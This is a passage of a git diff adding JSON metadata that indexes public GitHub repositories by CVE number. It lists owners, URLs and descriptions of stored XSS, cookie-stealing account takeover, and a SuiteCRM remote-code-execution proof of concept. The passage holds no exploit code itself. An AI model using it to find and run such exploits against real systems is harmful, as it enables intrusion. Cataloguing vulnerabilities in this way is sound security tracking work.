+ "created_at": "2021-12-19T17:50:15Z",
+ "updated_at": "2022-01-14T18:38:05Z",
+ "pushed_at": "2022-01-14T16:00:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448017630,
+ "name": "CVE-2021-45744",
+ "full_name": "plsanu\/CVE-2021-45744",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-45744",
+ "description": "CVE-2021-45744 - A Stored Cross Site Scripting (XSS) vulnerability exists in bludit 3.13.1 via the TAGS section in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating.",
+ "fork": false,
+ "created_at": "2022-01-14T15:36:21Z",
+ "updated_at": "2023-12-30T08:24:30Z",
+ "pushed_at": "2022-01-14T16:00:25Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45745.json b/2021/CVE-2021-45745.json
new file mode 100644
index 0000000000..536751fa80
--- /dev/null
+++ b/2021/CVE-2021-45745.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 439931620,
+ "name": "Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS",
+ "full_name": "plsanu\/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS",
+ "description": "CVE-2021-45745 - A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating.",
+ "fork": false,
+ "created_at": "2021-12-19T17:54:55Z",
+ "updated_at": "2022-01-14T18:37:28Z",
+ "pushed_at": "2022-01-14T16:51:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448040948,
+ "name": "CVE-2021-45745",
+ "full_name": "plsanu\/CVE-2021-45745",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-45745",
+ "description": "CVE-2021-45745 - A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating.",
+ "fork": false,
+ "created_at": "2022-01-14T16:52:08Z",
+ "updated_at": "2023-12-30T08:24:27Z",
+ "pushed_at": "2022-01-14T16:52:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45897.json b/2021/CVE-2021-45897.json
new file mode 100644
index 0000000000..2b1f09ad86
--- /dev/null
+++ b/2021/CVE-2021-45897.json
@@ -0,0 +1,40 @@
+[
+ {
+ "id": 454128931,
+ "name": "CVE-2021-45897",
+ "full_name": "manuelz120\/CVE-2021-45897",
+ "owner": {
+ "login": "manuelz120",
+ "id": 1948316,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1948316?v=4",
+ "html_url": "https:\/\/github.com\/manuelz120"
+ },
+ "html_url": "https:\/\/github.com\/manuelz120\/CVE-2021-45897",
+ "description": "PoC for CVE-2021-45897",
+ "fork": false,
+ "created_at": "2022-01-31T18:48:40Z",
+ "updated_at": "2023-08-31T15:08:09Z",
+ "pushed_at": "2022-01-31T20:07:45Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "owasp-top-ten",
+ "python3",
+ "rce",
+ "remote-code-execution",
+ "security",
+ "suitecrm"
+ ],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45901.json b/2021/CVE-2021-45901.json
new file mode 100644
index 0000000000..c98b326aa4
--- /dev/null
+++ b/2021/CVE-2021-45901.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 401943849,
+ "name": "CVE-2021-45901",
+ "full_name": "9lyph\/CVE-2021-45901",
+ "owner": {
+ "login": "9lyph",
+ "id": 44860700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44860700?v=4",
+ "html_url": "https:\/\/github.com\/9lyph"
+ },
+ "html_url": "https:\/\/github.com\/9lyph\/CVE-2021-45901",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-01T05:35:59Z",
+ "updated_at": "2022-04-06T14:45:40Z",
+ "pushed_at": "2023-06-12T03:11:34Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-45960.json b/2021/CVE-2021-45960.json
new file mode 100644
index 0000000000..b70fb403e8
--- /dev/null
+++ b/2021/CVE-2021-45960.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 480355744,
+ "name": "external_expat_AOSP10_r33_CVE-2021-45960",
+ "full_name": "nanopathi\/external_expat_AOSP10_r33_CVE-2021-45960",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/external_expat_AOSP10_r33_CVE-2021-45960",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-11T11:45:57Z",
+ "updated_at": "2022-04-11T12:31:47Z",
+ "pushed_at": "2022-04-11T11:50:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 496156933,
+ "name": "external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-",
+ "full_name": "Trinadh465\/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-25T09:03:48Z",
+ "updated_at": "2023-09-15T18:25:11Z",
+ "pushed_at": "2022-05-25T09:09:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 624286353,
+ "name": "external_expat_v2.2.6_CVE-2021-45960",
+ "full_name": "hshivhare67\/external_expat_v2.2.6_CVE-2021-45960",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/external_expat_v2.2.6_CVE-2021-45960",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-06T06:20:55Z",
+ "updated_at": "2023-04-06T06:30:55Z",
+ "pushed_at": "2023-04-06T06:32:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46005.json b/2021/CVE-2021-46005.json
new file mode 100644
index 0000000000..9d6427610e
--- /dev/null
+++ b/2021/CVE-2021-46005.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 452689935,
+ "name": "CVE-2021-46005",
+ "full_name": "nawed20002\/CVE-2021-46005",
+ "owner": {
+ "login": "nawed20002",
+ "id": 98532470,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98532470?v=4",
+ "html_url": "https:\/\/github.com\/nawed20002"
+ },
+ "html_url": "https:\/\/github.com\/nawed20002\/CVE-2021-46005",
+ "description": "CVE-2021-46005",
+ "fork": false,
+ "created_at": "2022-01-27T13:18:16Z",
+ "updated_at": "2022-01-27T13:50:06Z",
+ "pushed_at": "2022-02-03T11:01:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46063.json b/2021/CVE-2021-46063.json
new file mode 100644
index 0000000000..70aedad238
--- /dev/null
+++ b/2021/CVE-2021-46063.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 786354547,
+ "name": "CVE-2021-46063-2",
+ "full_name": "miguelc49\/CVE-2021-46063-2",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2021-46063-2",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-14T07:38:33Z",
+ "updated_at": "2024-04-14T17:38:55Z",
+ "pushed_at": "2024-04-16T00:54:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786354560,
+ "name": "CVE-2021-46063-1",
+ "full_name": "miguelc49\/CVE-2021-46063-1",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2021-46063-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-14T07:38:36Z",
+ "updated_at": "2024-04-14T17:38:50Z",
+ "pushed_at": "2024-04-16T00:54:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786354582,
+ "name": "CVE-2021-46063-3",
+ "full_name": "miguelc49\/CVE-2021-46063-3",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2021-46063-3",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-14T07:38:42Z",
+ "updated_at": "2024-04-14T17:38:58Z",
+ "pushed_at": "2024-04-16T00:54:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46067.json b/2021/CVE-2021-46067.json
new file mode 100644
index 0000000000..5dc9566c82
--- /dev/null
+++ b/2021/CVE-2021-46067.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442275205,
+ "name": "Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover",
+ "description": "CVE-2021-46067 - In Vehicle Service Management System 1.0 an attacker can steal the cookies leading to Full Account Takeover.",
+ "fork": false,
+ "created_at": "2021-12-27T21:15:41Z",
+ "updated_at": "2022-01-14T18:34:58Z",
+ "pushed_at": "2022-01-15T11:30:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448049310,
+ "name": "CVE-2021-46067",
+ "full_name": "plsanu\/CVE-2021-46067",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46067",
+ "description": "CVE-2021-46067 - In Vehicle Service Management System 1.0 an attacker can steal the cookies leading to Full Account Takeover.",
+ "fork": false,
+ "created_at": "2022-01-14T17:19:09Z",
+ "updated_at": "2023-12-30T08:23:32Z",
+ "pushed_at": "2022-01-15T11:31:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46068.json b/2021/CVE-2021-46068.json
new file mode 100644
index 0000000000..75e19bbb9c
--- /dev/null
+++ b/2021/CVE-2021-46068.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442284128,
+ "name": "Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS",
+ "description": "CVE-2021-46068 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.",
+ "fork": false,
+ "created_at": "2021-12-27T22:07:08Z",
+ "updated_at": "2022-01-14T18:36:14Z",
+ "pushed_at": "2022-01-14T19:33:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448062357,
+ "name": "CVE-2021-46068",
+ "full_name": "plsanu\/CVE-2021-46068",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46068",
+ "description": "CVE-2021-46068 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.",
+ "fork": false,
+ "created_at": "2022-01-14T18:04:01Z",
+ "updated_at": "2023-12-30T08:24:13Z",
+ "pushed_at": "2022-01-14T19:34:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46069.json b/2021/CVE-2021-46069.json
new file mode 100644
index 0000000000..6571c2d051
--- /dev/null
+++ b/2021/CVE-2021-46069.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442477283,
+ "name": "Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS",
+ "description": "CVE-2021-46069 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.",
+ "fork": false,
+ "created_at": "2021-12-28T13:47:59Z",
+ "updated_at": "2022-01-14T18:32:37Z",
+ "pushed_at": "2022-01-14T18:27:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448068658,
+ "name": "CVE-2021-46069",
+ "full_name": "plsanu\/CVE-2021-46069",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46069",
+ "description": "CVE-2021-46069 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.",
+ "fork": false,
+ "created_at": "2022-01-14T18:27:00Z",
+ "updated_at": "2023-12-30T08:24:23Z",
+ "pushed_at": "2022-01-14T18:27:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46070.json b/2021/CVE-2021-46070.json
new file mode 100644
index 0000000000..13d74028fd
--- /dev/null
+++ b/2021/CVE-2021-46070.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442480867,
+ "name": "Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS",
+ "description": "CVE-2021-46070 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel.",
+ "fork": false,
+ "created_at": "2021-12-28T14:00:52Z",
+ "updated_at": "2022-01-14T18:53:00Z",
+ "pushed_at": "2022-01-14T19:33:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448075803,
+ "name": "CVE-2021-46070",
+ "full_name": "plsanu\/CVE-2021-46070",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46070",
+ "description": "CVE-2021-46070 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel.",
+ "fork": false,
+ "created_at": "2022-01-14T18:54:29Z",
+ "updated_at": "2023-12-30T08:24:16Z",
+ "pushed_at": "2022-01-14T19:32:55Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46071.json b/2021/CVE-2021-46071.json
new file mode 100644
index 0000000000..7d9aadf2a3
--- /dev/null
+++ b/2021/CVE-2021-46071.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442483260,
+ "name": "Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS",
+ "description": "CVE-2021-46071 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.",
+ "fork": false,
+ "created_at": "2021-12-28T14:09:54Z",
+ "updated_at": "2022-01-14T19:06:22Z",
+ "pushed_at": "2022-01-14T19:09:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448079716,
+ "name": "CVE-2021-46071",
+ "full_name": "plsanu\/CVE-2021-46071",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46071",
+ "description": "CVE-2021-46071 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.",
+ "fork": false,
+ "created_at": "2022-01-14T19:09:36Z",
+ "updated_at": "2023-12-30T08:24:20Z",
+ "pushed_at": "2022-01-14T19:10:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46072.json b/2021/CVE-2021-46072.json
new file mode 100644
index 0000000000..91d60c4ce7
--- /dev/null
+++ b/2021/CVE-2021-46072.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442486693,
+ "name": "Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS",
+ "description": "CVE-2021-46072 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.",
+ "fork": false,
+ "created_at": "2021-12-28T14:22:43Z",
+ "updated_at": "2022-01-30T06:06:55Z",
+ "pushed_at": "2022-01-14T19:29:34Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448085974,
+ "name": "CVE-2021-46072",
+ "full_name": "plsanu\/CVE-2021-46072",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46072",
+ "description": "CVE-2021-46072 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.",
+ "fork": false,
+ "created_at": "2022-01-14T19:34:50Z",
+ "updated_at": "2023-12-30T08:24:11Z",
+ "pushed_at": "2022-01-14T19:35:21Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46073.json b/2021/CVE-2021-46073.json
new file mode 100644
index 0000000000..980bda7209
--- /dev/null
+++ b/2021/CVE-2021-46073.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442488607,
+ "name": "Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS",
+ "description": "CVE-2021-46073 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel.",
+ "fork": false,
+ "created_at": "2021-12-28T14:29:44Z",
+ "updated_at": "2022-01-14T19:44:54Z",
+ "pushed_at": "2022-01-14T19:47:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
